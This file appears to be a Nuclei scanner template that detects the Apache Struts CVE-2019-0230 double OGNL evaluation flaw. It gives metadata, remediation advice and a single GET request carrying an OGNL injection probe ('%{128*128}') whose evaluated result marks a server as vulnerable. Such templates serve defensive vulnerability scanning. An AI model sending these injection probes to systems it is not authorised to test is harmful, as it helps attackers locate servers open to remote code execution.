nuclei-templates/http/cves/2019/CVE-2019-0230.yaml

44 lines
1.7 KiB
YAML

id: CVE-2019-0230
info:
name: Apache Struts <=2.5.20 - Remote Code Execution
author: geeknik
severity: critical
description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.
remediation: |
Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-0230
- https://cwiki.apache.org/confluence/display/WW/S2-059
- https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability
- http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html
- https://cwiki.apache.org/confluence/display/ww/s2-059
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-0230
cwe-id: CWE-1321
epss-score: 0.94961
epss-percentile: 0.99103
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: struts
tags: tenable,packetstorm,struts,rce,cve,cve2019,apache
variables:
str: "{{rand_base(6)}}"
http:
- method: GET
path:
- "{{BaseURL}}/?id={{str}}%25{128*128}"
matchers:
- type: word
part: body
words:
- "{{str}}16384"
# digest: 490a0046304402201b053aed153f3b85c41f9b2fbb5b125b073e4e66805a7ae6ca749ee23629b2940220132cf6803a09257d18a98efae36d73ec461c857dd17236a4d6cf157cc2a130c7:922c64590222798bb761d5b6d8e72950